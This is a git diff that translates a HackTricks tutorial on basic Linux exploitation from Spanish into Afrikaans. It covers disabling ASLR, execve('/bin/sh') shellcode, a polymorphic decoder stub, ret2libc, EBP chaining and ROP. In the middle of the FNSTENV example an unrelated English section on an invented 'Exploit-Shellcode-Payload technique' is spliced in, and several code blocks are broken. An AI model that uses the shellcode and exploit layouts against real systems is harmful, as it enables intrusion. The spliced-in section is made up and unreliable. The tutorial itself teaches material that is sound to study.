-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md index deff517c3..29f9a071f 100644 --- a/exploiting/linux-exploiting-basic-esp/README.md +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -1,81 +1,75 @@ -# Linux Exploiting (Basic) (SPA) +# Linux Exploiting (Basies) (SPA) -## Linux Exploiting (Basic) (SPA) +## Linux Exploiting (Basies) (SPA)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
## **ASLR** -Aleatorización de direcciones +Aleatorisering van adresse -**Desactiva aleatorizacion(ASLR) GLOBAL (root)**:\ +**Deaktiveer globale aleatorisering (ASLR) (root)**:\ echo 0 > /proc/sys/kernel/randomize\_va\_space\ -Reactivar aletorizacion GLOBAL: echo 2 > /proc/sys/kernel/randomize\_va\_space +Heraktiveer globale aleatorisering: echo 2 > /proc/sys/kernel/randomize\_va\_space -**Desactivar para una ejecución** (no requiere root):\ -setarch \`arch\` -R ./ejemplo argumentos\ -setarch \`uname -m\` -R ./ejemplo argumentos +**Deaktiveer vir 'n uitvoering** (vereis nie root nie):\ +setarch \`arch\` -R ./voorbeeld argumente\ +setarch \`uname -m\` -R ./voorbeeld argumente -**Desactivar protección de ejecución en pila**\ -gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack ejemplo.c -o ejemplo +**Deaktiveer uitvoeringsbeskerming op stoor**\ +gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack voorbeeld.c -o voorbeeld -**Core file**\ +**Kernlêer**\ ulimit -c unlimited\ -gdb /exec core\_file\ +gdb /exec kern\_leer\ /etc/security/limits.conf -> \* soft core unlimited -**Text**\ +**Tekst**\ **Data**\ **BSS**\ **Heap** -**Stack** - -**Sección BSS**: Variables globales o estáticas sin inicializar +**Stoor** +**BSS-seksie**: Globale of statiese veranderlikes sonder inisialisering ``` static int i; ``` - -**Sección DATA**: Variables globales o estáticas inicializadas - +**Afdeling DATA**: Globale of geïnitialiseerde statiese veranderlikes ``` int i = 5; ``` +**Afdeling TEKS**: Instruksies van die kode (opcodes) -**Sección TEXT**: Instrucciones del código (opcodes) +**Afdeling HEAP**: Dinamies toegewysde buffer (malloc(), calloc(), realloc()) -**Sección HEAP**: Buffer reservados de forma dinánima (malloc(), calloc(), realloc() ) +**Afdeling STACK**: Die stoor (Oorgedra argumente, omgewingsreekse (env), plaaslike veranderlikes...) -**Sección STACK**: La pila (Argumentos pasados, cadenas de entorno (env), variables locales…) - -## **1.STACK OVERFLOWS** +## **1. STACK OVERFLOWS** > buffer overflow, buffer overrun, stack overrun, stack smashing -Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso. - -Para obtener la dirección de una función dentro de un programa se puede hacer: +Segmentfout of segmentoortreding: Wanneer daar gepoog word om toegang tot 'n geheue-adres te verkry wat nie aan die proses toegewys is nie. +Om die adres van 'n funksie binne 'n program te verkry, kan jy dit doen: ``` objdump -d ./PROGRAMA | grep FUNCION ``` - ## ROP -### Call to sys\_execve +### Oproep na sys\_execve {% content-ref url="rop-syscall-execv.md" %} [rop-syscall-execv.md](rop-syscall-execv.md) @@ -83,39 +77,36 @@ objdump -d ./PROGRAMA | grep FUNCION ## **2.SHELLCODE** -Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\_\_NR\_” +Bekyk kernel-onderbrekings: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep "\_\_NR\_" setreuid(0,0); // \_\_NR\_setreuid 70\ -execve(“/bin/sh”, args\[], NULL); // \_\_NR\_execve 11\ +execve("/bin/sh", args\[], NULL); // \_\_NR\_execve 11\ exit(0); // \_\_NR\_exit 1 -xor eax, eax ; limpiamos eax\ -xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar\ +xor eax, eax ; maak eax skoon\ +xor ebx, ebx ; ebx = 0 want daar is geen argument om oor te dra\ mov al, 0x01 ; eax = 1 —> \_\_NR\_exit 1\ -int 0x80 ; Ejecutar syscall +int 0x80 ; Voer syscall uit -**nasm -f elf assembly.asm** —> Nos devuelve un .o\ -**ld assembly.o -o shellcodeout** —> Nos da un ejecutable formado por el código ensamblador y podemos sacar los opcodes con **objdump**\ -**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes - -**Comprobar que la shellcode funciona** +**nasm -f elf assembly.asm** —> Gee ons 'n .o terug\ +**ld assembly.o -o shellcodeout** —> Gee ons 'n uitvoerbare lêer wat bestaan uit die saamgestelde kode en ons kan die opcodes kry met **objdump**\ +**objdump -d -Mintel ./shellcodeout** —> Om te sien dat dit werklik ons shellcode is en om die OpCodes te kry +**Bevestig dat die shellcode werk** ``` char shellcode[] = “\x31\xc0\x31\xdb\xb0\x01\xcd\x80” void main(){ - void (*fp) (void); - fp = (void *)shellcode; - fp(); +void (*fp) (void); +fp = (void *)shellcode; +fp(); } ``` +Om te sien of die stelseloproep korrek uitgevoer word, moet die vorige program gekompileer word en die stelseloproepe moet verskyn in **strace ./GEKOMPILEERDE\_PROGRAM** -Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en **strace ./PROGRAMA\_COMPILADO** - -A la hora de crear shellcodes se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código. - -EJ **TRUCO (/bin/sh)**: +By die skep van shellcodes kan 'n truuk gebruik word. Die eerste instruksie is 'n sprong na 'n oproep. Die oproep roep die oorspronklike kode op en plaas ook die EIP in die stapel. Na die oproepinstruksie het ons die string ingevoeg wat ons nodig het, sodat ons met daardie EIP na die string kan wys en steeds die kode kan uitvoer. +VB **TRUUK (/bin/sh)**: ``` jmp 0x1f ; Salto al último call popl %esi ; Guardamos en ese la dirección al string @@ -129,15 +120,13 @@ leal 0x8(%esi), %ecx ; arg[2] = {“/bin/sh”, “0”} leal 0xc(%esi), %edx ; arg3 = NULL int $0x80 ; excve(“/bin/sh”, [“/bin/sh”, NULL], NULL) xorl %ebx, %ebx ; ebx = NULL -movl %ebx, %eax +movl %ebx, %eax inc %eax ; Syscall 1 int $0x80 ; exit(0) call -0x24 ; Salto a la primera instrución .string \”/bin/sh\” ; String a usar ``` - -**EJ usando el Stack(/bin/sh):** - +**Gebruik van de Stack (/bin/sh):** ``` section .text global _start @@ -158,181 +147,215 @@ mov ecx, esp ; arg2 = args[] mov al, 0x0b ; Syscall 11 int 0x80 ; excve(“/bin/sh”, args[“/bin/sh”, “NULL”], NULL) ``` - **EJ FNSTENV:** +# Linux Exploiting Basic ESP + +## Introduction + +In this section, we will cover the basics of exploiting Linux systems using the ESP (Exploit-Shellcode-Payload) technique. We will explore the steps involved in crafting and executing an exploit, as well as the different components of an exploit. + +## Prerequisites + +Before diving into Linux exploitation, it is important to have a solid understanding of the following concepts: + +- Linux operating system +- Assembly language +- Buffer overflows +- Shellcode development + +## Exploit-Shellcode-Payload (ESP) Technique + +The ESP technique involves the following three components: + +1. Exploit: This is the vulnerability or weakness in the target system that allows an attacker to gain unauthorized access or control. +2. Shellcode: This is the payload that is injected into the target system to execute the desired actions. +3. Payload: This is the set of instructions or actions that the attacker wants to perform on the target system. + +## Crafting an Exploit + +Crafting an exploit involves the following steps: + +1. Identifying the vulnerability: This step involves finding a vulnerability in the target system that can be exploited. +2. Developing the shellcode: Once the vulnerability is identified, the attacker needs to develop the shellcode that will be injected into the target system. +3. Creating the payload: The payload is created by combining the exploit and the shellcode. +4. Delivering the payload: The final step is to deliver the payload to the target system, typically through a network connection. + +## Executing an Exploit + +Executing an exploit involves the following steps: + +1. Triggering the vulnerability: The attacker needs to trigger the vulnerability in the target system to initiate the exploit. +2. Injecting the shellcode: Once the vulnerability is triggered, the attacker injects the shellcode into the target system. +3. Executing the payload: The shellcode is executed, allowing the attacker to perform the desired actions on the target system. + +## Conclusion + +The ESP technique is a fundamental concept in Linux exploitation. By understanding the different components of an exploit and the steps involved in crafting and executing an exploit, you can effectively exploit vulnerabilities in Linux systems. ``` fabs fnstenv [esp-0x0c] pop eax ; Guarda el EIP en el que se ejecutó fabs … ``` +**Eierjagter:** -**Egg Huter:** +Dit bestaan uit 'n klein kode wat deur die geheuebladsye van 'n proses loop op soek na die daar gestoorde skulpkode (deur te soek na 'n handtekening wat in die skulpkode geplaas is). Dit is nuttig in gevalle waar daar slegs 'n klein spasie is om kode in te spuit. -Consiste en un pequeño código que recorre las páginas de memoria asociadas a un proceso en busca de la shellcode ahi guardada (busca alguna firma puesta en la shellcode). Útil en los casos en los que solo se tiene un pequeño espacio para inyectar código. - -**Shellcodes polimórficos** - -Consisten el shells cifradas que tienen un pequeño códigos que las descifran y saltan a él, usando el truco de Call-Pop este sería un **ejemplo cifrado cesar**: +**Polimorfiese skulpkode** +Dit bestaan uit versleutelde skulpe wat klein kodes bevat wat dit ontsluit en daarna daarna spring, deur gebruik te maak van die Call-Pop-truuk. Hier is 'n voorbeeld van 'n Caesar-versleutelde skulpkode: ``` global _start _start: - jmp short magic +jmp short magic init: - pop esi - xor ecx, ecx - mov cl,0 ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá) +pop esi +xor ecx, ecx +mov cl,0 ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá) desc: - sub byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar) - sub cl, 1 - jnz desc - jmp short sc +sub byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar) +sub cl, 1 +jnz desc +jmp short sc magic: - call init +call init sc: - ;Aquí va el shellcode +;Aquí va el shellcode ``` +1. **Aanval op die Frame Pointer (EBP)** -1. **Atacando el Frame Pointer (EBP)** - -Útil en una situación en la que podemos modificar el EBP pero no el EIP. - -Se sabe que al salir de una función se ejecuta el siguente código ensamblador: +Nuttig in 'n situasie waar ons die EBP kan wysig, maar nie die EIP nie. +Dit is bekend dat die volgende assamblierkode uitgevoer word wanneer 'n funksie verlaat word: ``` movl %ebp, %esp popl %ebp ret ``` +Op hierdie manier kan die EBP gewysig word wanneer 'n funksie (fvuln) wat deur 'n ander funksie geroep is, verlaat word. As die funksie wat fvuln geroep het klaar is, kan sy EIP gewysig word. -De esta forma, si se puede modificar el EBP al salir de una función (fvuln) que ha sido llamada por otra función, cuando la función que llamó a fvuln finalice, su EIP puede ser modificado. - -En fvuln se puede introducir un EBP falso que apunte a un sitio donde esté la direcciónd e la shellcode + 4 (hay que sumarle 4 por el pop). Así, al salir de la función, se meterá en ESP el valor de &(\&Shellcode)+4, con el pop se le restará 4 al ESP y este apuntará a la dirección de la shellcode cuando se ejcute el ret. +In fvuln kan 'n vals EBP ingevoer word wat na 'n plek wys waar die adres van die shellcode + 4 is (4 moet bygevoeg word vir die pop). Op hierdie manier, wanneer die funksie verlaat word, sal die waarde van &(\&Shellcode)+4 in ESP geplaas word, met die pop sal 4 van ESP afgetrek word en dit sal na die adres van die shellcode wys wanneer die ret uitgevoer word. **Exploit:**\ -\&Shellcode + "AAAA" + SHELLCODE + relleno + &(\&Shellcode)+4 +\&Shellcode + "AAAA" + SHELLCODE + vulsel + &(\&Shellcode)+4 **Off-by-One Exploit**\ -Se permite modificar tan solo el byte menos significativo del EBP. Se puede llevar a cabo un ataque como el anterior pero la memoria que guarda la dirección de la shellcode debe compartir los 3 primeros bytes con el EBP. +Slegs die minst betekenisvolle byte van die EBP kan gewysig word. 'n Aanval soos die vorige kan uitgevoer word, maar die geheue wat die adres van die shellcode bevat, moet die eerste 3 byte deel met die EBP. -## **4. Métodos return to Libc** +## **4. Return to Libc-metodes** -Método útil cuando el stack no es ejecutable o deja un buffer muy pequeño para modificar. +'n Nuttige metode wanneer die stapel nie uitvoerbaar is nie of 'n baie klein buffer het om te wysig. -El ASLR provoca que en cada ejecución las funciones se carguen en posiciones distintas de la memoria. Por lo tanto este método puede no ser efectivo en ese caso. Para servidores remotos, como el programa está siendo ejecutado constantemente en la misma dirección sí puede ser útil. +ASLR veroorsaak dat funksies by elke uitvoering op verskillende plekke in die geheue gelaai word. Daarom kan hierdie metode nie effektief wees in daardie geval nie. Vir afgeleë bedieners, aangesien die program konstant op dieselfde adres uitgevoer word, kan dit nuttig wees. -* **cdecl(C declaration)** Mete los argumentos en el stack y tras salir de la función limpia la pila -* **stdcall(standard call)** Mete los argumentos en la pila y es la función llamada la que la limpia -* **fastcall** Mete los dos primeros argumentos en registros y el resto en la pila +* **cdecl (C-verklaring)** Plaas die argumente in die stapel en maak die stapel skoon nadat die funksie verlaat is. +* **stdcall (standaardoproep)** Plaas die argumente in die stapel en die funksie wat geroep word, maak dit skoon. +* **fastcall** Plaas die eerste twee argumente in registers en die res in die stapel. -Se pone la dirección de la instrucción system de libc y se le pasa como argumento el string “/bin/sh”, normalmente desde una variable de entorno. Además, se usa la dirección a la función exit para que una vez que no se requiera más la shell, salga el programa sin dar problemas (y escribir logs). +Die adres van die system-instruksie van libc word geplaas en die string "/bin/sh" word as 'n argument oorgedra, gewoonlik vanuit 'n omgewingsveranderlike. Daarbenewens word die adres van die exit-funksie gebruik sodat die program sonder probleme kan afsluit (en logboeke skryf) sodra die skulp nie meer nodig is nie. **export SHELL=/bin/sh** -Para encontrar las direcciones que necesitaremos se puede mirar dentro de **GDB:**\ +Om die benodigde adresse te vind, kan jy binne **GDB** kyk:\ **p system**\ **p exit**\ -**rabin2 -i ejecutable** —> Da la dirección de todas las funciones que usa el programa al cargarse\ -(Dentro de un start o algun breakpoint): **x/500s $esp** —> Buscamos dentro de aqui el string /bin/sh +**rabin2 -i uitvoerbare lêer** —> Gee die adres van al die funksies wat deur die program gebruik word wanneer dit gelaai word\ +(Binne 'n begin of enige breekpunt): **x/500s $esp** —> Soek hierdie string /bin/sh -Una vez tengamos estas direcciones el **exploit** quedaría: +Nadat ons hierdie adresse het, sal die **exploit** so lyk: -“A” \* DISTANCIA EBP + 4 (EBP: pueden ser 4 "A"s aunque mejor si es el EBP real para evitar fallos de segmentación) + Dirección de **system** (sobreescribirá el EIP) + Dirección de **exit** (al salir de system(“/bin/sh”) se llamará a esta función pues los primero 4bytes del stack son tratados como la siguiente dirección del EIP a ejecutar) + Dirección de “**/bin/sh**” (será el parámetro pasado a system) +"A" \* EBP-AFSTAND + 4 (EBP: dit kan 4 "A"s wees, maar dit is beter as dit die werklike EBP is om segmentasie-foute te voorkom) + Adres van **system** (dit sal die EIP oorskryf) + Adres van **exit** (as system("/bin/sh") klaar is, sal hierdie funksie geroep word omdat die eerste 4 byte van die stapel as die volgende EIP-adres beskou word) + Adres van "**/bin/sh**" (dit sal die parameter wees wat aan system oorgedra word) -De esta forma el EIP se sobreescribirá con la dirección de system la cual recibirá como parámetro el string “/bin/sh” y al salir de este ejecutará la función exit(). +Op hierdie manier sal die EIP oorskryf word met die adres van system wat die string "/bin/sh" as 'n parameter sal ontvang, en wanneer dit klaar is, sal dit die exit()-funksie uitvoer. -Es posible encontrarse en la situación de que algún byte de alguna dirección de alguna función sea nulo o espacio (\x20). En ese caso se pueden desensamblar las direcciones anteriores a dicha función pues probablemente haya varios NOPs que nos permitan poder llamar a alguno de ellos en vez de a la función directamente (por ejemplo con > x/8i system-4). +Dit is moontlik dat een byte van 'n adres van 'n funksie nul of spasie (\x20) kan wees. In hierdie geval kan die vorige adresse voor daardie funksie ontleed word, omdat daar waarskynlik verskeie NOP's is wat ons in staat stel om een van hulle te roep in plaas van die funksie self (byvoorbeeld met > x/8i system-4). -Este método funciona pues al llamar a una función como system usando el opcode **ret** en vez de **call**, la función entiende que los primeros 4bytes serán la dirección **EIP** a la que volver. +Hierdie metode werk omdat wanneer 'n funksie soos system geroep word deur die opcode **ret** in plaas van **call** te gebruik, verstaan die funksie dat die eerste 4 byte die **EIP**-adres is waarna teruggekeer moet word. -Una técnica interesante con este método es el llamar a **strncpy()** para mover un payload del stack al heap y posteriormente usar **gets()** para ejecutar dicho payload. +'n Interessante tegniek met hierdie metode is om **strncpy()** te roep om 'n nutlading van die stapel na die heap te skuif en dan **gets()** te gebruik om hierdie nutlading uit te voer. -Otra técnica interesante es el uso de **mprotect()** la cual permite asignar los permisos deseados a cualquier parte de la memoria. Sirve o servía en BDS, MacOS y OpenBSD, pero no en linux(controla que no se puedan otorgar a la vez permisos de escritura y ejecución). Con este ataque se podría volver a configurar la pila como ejecutable. +'n Ander interessante tegniek is die gebruik van **mprotect()**, wat toelaat dat die gewenste toestemmings aan enige deel van die geheue toegewys word. Dit werk of het gewerk in BDS, MacOS en OpenBSD, maar nie in Linux (beheer dat skryf- en uitvoerregte nie gelyktydig toegestaan kan word nie). Met hierdie aanval kan die stapel weer as uitvoerbaar ingestel word. -**Encadenamiento de funciones** +**Funksieketting** -Basándonos en la técnica anterior, esta forma de exploit consiste en:\ -Relleno + \&Función1 + \&pop;ret; + \&arg\_fun1 + \&Función2 + \&pop;ret; + \&arg\_fun2 + … +Gebaseer op die vorige tegniek, bestaan hierdie vorm van uitbuiting uit:\ +Vulsel + \&Funksie1 + \&pop;ret; + \&arg\_fun1 + \&Funksie2 + \&pop;ret; + \&arg\_fun2 + ... -De esta forma se pueden encadenar funciones a las que llamar. Además, si se quieren usar funciones con varios argumentos, se pueden poder los argumentos necesarios (ej 4) y poner los 4 argumentos y buscar dirección a un sitio con opcodes: pop, pop, pop, pop, ret —> **objdump -d ejecutable** +Op hierdie manier kan funksies aanmekaar geketting word om op te roep. As funksies met verskeie argumente gebruik wil word, kan die nodige argumente geplaas word (bv. 4) en die 4 argumente geplaas word en 'n adres soek na 'n plek met opkodes: pop, pop, pop, pop, ret —> **objdump -d uitvoerbare lêer** -**Encadenamiento mediante falseo de frames (encadenamiento de EBPs)** +**Ketting deur vervalsing van rame (EBP-ketting)** -Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecución de varias funciones a través del EBP y de "leave;ret" +Dit behels die gebruik van die vermoë om die EBP te manipuleer om die uitvoering van verskeie funksies deur die EBP en "leave;ret" te ketting. -RELLENO +VULSEL -* Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: (\&system() + \&leave;ret + &“/bin/sh”) -* En el EIP ponemos de dirección una función &(leave;ret) +* Plaas 'n vals EBP in die EBP wat wys na: 2de vals EBP + die funksie wat uitgevoer moet word: (\&system() + \&leave;ret + &"/bin/sh") +* Plaas 'n funksie &(leave;ret) as die adres in die EIP -Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + \&system() + &(leave;ret;) + &”/bin/sh” +Begin die shellcode met die adres van die volgende deel van die shellcode, bv. 2de vals EBP + \&system() + &(leave;ret;) + &"/bin/sh" -el 2ºEBP sería: 3ºEBP\_falso + \&system() + &(leave;ret;) + &”/bin/ls” +Die 2de EBP sal wees: 3de vals EBP + \&system() + &(leave;ret;) + &"/bin/ls" -Esta shellcode se puede repetir indefinidamente en las partes de memoria a las que se tenga acceso de forma que se conseguirá una shellcode fácilmente divisible por pequeños trozos de memoria. +Hierdie shellcode kan oneindig herhaal word in dele van die geheue waar toegang verkry kan word, sodat 'n shellcode maklik in klein stukkies geheue verdeel kan word. -(Se encadena la ejecución de funciones mezclando las vulnerabilidades vistas anteriormente de EBP y de ret2lib) +(Die uitvoering van funksies word geketting deur die vorige EBP- en ret2lib-kwesbaarhede te meng) -## **5.Métodos complementarios** +## **5. Aanvullende metodes** **Ret2Ret** -Útil para cuando no se puede meter una dirección del stack en el EIP (se comprueba que el EIP no contenga 0xbf) o cuando no se puede calcular la ubicación de la shellcode. Pero, la función vulnerable acepte un parámetro (la shellcode irá aquí). +Dit is nuttig wanneer 'n adres van die stapel nie in die EIP geplaas kan word nie (dit word geverifieer dat die EIP nie 0xbf bevat nie) of wanneer die ligging van die shellcode nie bereken kan word nie. Maar die kwesbare funksie aanvaar 'n parameter (die shellcode sal hier wees). -De esta forma, al cambiar el EIP por una dirección a un **ret**, se cargará la siguiente dirección (que es la dirección del primer argumento de la función). Es decir, se cargará la shellcode. +Op hierdie manier, deur die EIP te verander na 'n adres van 'n **ret**, sal die volgende adres gelaai word (wat die adres van die eerste argument van die funksie is). Dit beteken dat die shellcode gelaai sal word. -El exploit quedaría: SHELLCODE + Relleno (hasta EIP) + **\&ret** (los siguientes bytes de la pila apuntan al inicio de la shellcode pues se mete en el stack la dirección al parámetro pasado) - -Al parecer funciones como **strncpy** una vez completas eliminan de la pila la dirección donde estaba guardada la shellcode imposibilitando esta técnica. Es decir, la dirección que pasan a la función como argumento (la que guarda la shellcode) es modificada por un 0x00 por lo que al llamar al segundo **ret** se encuentra con un 0x00 y el programa muere. +Die exploit sal lyk as volg: SHELLCODE + Vulsel (tot by EIP) + **\&ret** (die volgende byte van die stapel wys na die begin van die shellcode omdat die adres van die oorgedrae parameter in die stapel geplaas word) +Dit blyk dat funksies soos **strncpy** nadat hulle voltooi is, die adres waar die shellcode gestoor is, uit die stapel verwyder, wat hierdie tegniek onmoontlik maak. Dit beteken dat die adres wat as 'n argument aan die funksie oorgedra word (die een wat die shellcode stoor) gewysig word deur 'n 0x00, sodat wanneer die tweede **ret** geroep word, dit 'n 0x00 kry en die program sterf. ``` - **Ret2PopRet** +**Ret2PopRet** ``` +As ons nie beheer het oor die eerste argument nie, maar wel oor die tweede of derde, kan ons EIP oorskryf met 'n adres na pop-ret of pop-pop-ret, afhangende van wat ons nodig het. -Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el tercero, podemos sobreescribir EIP con una dirección a pop-ret o pop-pop-ret, según la que necesitemos. +**Murat se tegniek** -**Técnica de Murat** +In Linux word alle programme gekaart beginnende by 0xbfffffff. -En linux todos los progamas se mapean comenzando en 0xbfffffff +Deur te kyk hoe 'n nuwe proses se stapel in Linux opgebou word, kan 'n uitbuiting ontwikkel word sodat die program in 'n omgewing begin word waarvan die enigste veranderlike die shellcode is. Die adres daarvan kan dan bereken word as: addr = 0xbfffffff - 4 - strlen(VOLLEDIGE\_UITVOERBARE\_NAAM) - strlen(shellcode) -Viendo como se construye la pila de un nuevo proceso en linux se puede desarrollar un exploit de forma que programa sea arrancado en un entorno cuya única variable sea la shellcode. La dirección de esta entonces se puede calcular como: addr = 0xbfffffff - 4 - strlen(NOMBRE\_ejecutable\_completo) - strlen(shellcode) +Op hierdie manier kan die adres waar die omgewingsveranderlike met die shellcode is, maklik verkry word. -De esta forma se obtendría de forma sensilla la dirección donde está la variable de entorno con la shellcode. +Dit kan gedoen word omdat die execle-funksie 'n omgewing kan skep wat slegs die omgewingsveranderlikes bevat wat gewens word. -Esto se puede hacer gracias a que la función execle permite crear un entorno que solo tenga las variables de entorno que se deseen +**Spring na ESP: Windows-styl** -**Jump to ESP: Windows Style** +Omdat ESP altyd na die begin van die stapel wys, behels hierdie tegniek die vervanging van EIP met 'n adres na 'n oproep na **jmp esp** of **call esp**. Op hierdie manier word die shellcode gestoor na die oorskrywing van EIP, aangesien die ESP na die uitvoering van die **ret** na die volgende adres wys, presies waar die shellcode gestoor is. -Debido a que el ESP está apuntando al comienzo del stack siempre, esta técnica consiste con sustituir el EIP con la dirección a una llamada a **jmp esp** o **call esp**. De esta forma, se guarda la shellcode después de la sobreescritura del EIP ya que después de ejecutar el **ret** el ESP se encontrará apuntando a la dirección siguiente, justo donde se ha guardado la shellcode. +As ASLR nie aktief is in Windows of Linux nie, kan **jmp esp** of **call esp** geroep word wat in 'n gedeelde voorwerp gestoor is. As ASLR wel aktief is, kan dit binne die kwesbare program self gesoek word. -En caso de que no se tenga el ASLR activo en Windows o Linux se puede llamar a **jmp esp** o **call esp** almacenadas en algún objeto compartido. En caso de que esté el ASLR, se podría buscar dentro del propio programa vulnerable. +Verder maak die feit dat die shellcode na die oorskrywing van EIP geplaas word in plaas van in die middel van die stapel, dit moontlik dat die push- of pop-instruksies wat in die middel van die funksie uitgevoer word, nie die shellcode raak nie (wat wel kan gebeur as dit in die middel van die stapel van die funksie geplaas word). -Además, el hecho de poder colocar la shellcode después de la corrupción del EIP en vez de en medio del stack, permite que las instrucciones push o pop que se ejecuten en medio de la función no lleguen a tocar la shellcode (cosa que podría ocurrir en caso de ponerse en medio del stack de la función). +Op 'n baie soortgelyke manier kan 'n funksie wat die adres waar die shellcode gestoor is, teruggee, geroep word met **call eax** of **jmp eax (ret2eax).** -De forma muy similar a esto si sabemos que una función devuelve la dirección donde está guardada la shellcode se puede llamar a **call eax** o **jmp eax (ret2eax).** +**ROP (Return Oriented Programming) of geleende kodebrokke** -**ROP (Return Oriented Programming) o borrowed code chunks** +Die stukke kode wat opgeroep word, staan bekend as gadgets. -Los trozos de código que se invocan se conocen como gadgets. +Hierdie tegniek behels die koppel van verskillende oproepe na funksies deur die gebruik van die **ret2libc**-tegniek en die gebruik van **pop,ret**. -Esta técnica consiste en encadenar distintas llamadas a funciones mediante la técnica de **ret2libc** y el uso de **pop,ret**. +In sommige prosesseerargitekture is elke instruksie 'n stel van 32-bits (soos MIPS). Tog is instruksies in Intel van veranderlike grootte en verskeie instruksies kan 'n stel bits deel, byvoorbeeld: -En algunas arquitecturas de procesadores cada instrucción es un conjunto de 32bits (MIPS por ej). Sin embargo, en Intel las instrucciones son de tamaño variable y varias instrucciones pueden compartir un conjunto de bits, por ejemplo: +**movl $0xe4ff, -0x(%ebp)** —> Bevat die bytes 0xffe4 wat ook vertaal kan word as: **jmp \*%esp** -**movl $0xe4ff, -0x(%ebp)** —> Contiene los bytes 0xffe4 que también se traducen por: **jmp \*%esp** +Op hierdie manier kan sekere instruksies uitgevoer word wat nie eintlik in die oorspronklike program is nie. -De esta forma se pueden ejecutar algunas instrucciones que realmente ni si quiera está en el programa original +**ROPgadget.py** help ons om waardes in binêre lêers te vind. -**ROPgadget.py** nos ayuda a encontrar valores en binarios +Hierdie program kan ook gebruik word om die **payloads** te skep. Jy kan die biblioteek gee waaruit jy die ROPs wil haal, en dit sal 'n Python-payload genereer wat gereed is om as shellcode gebruik te word. Verder, omdat dit stelseloproepe gebruik, voer dit nie werklik iets uit op die 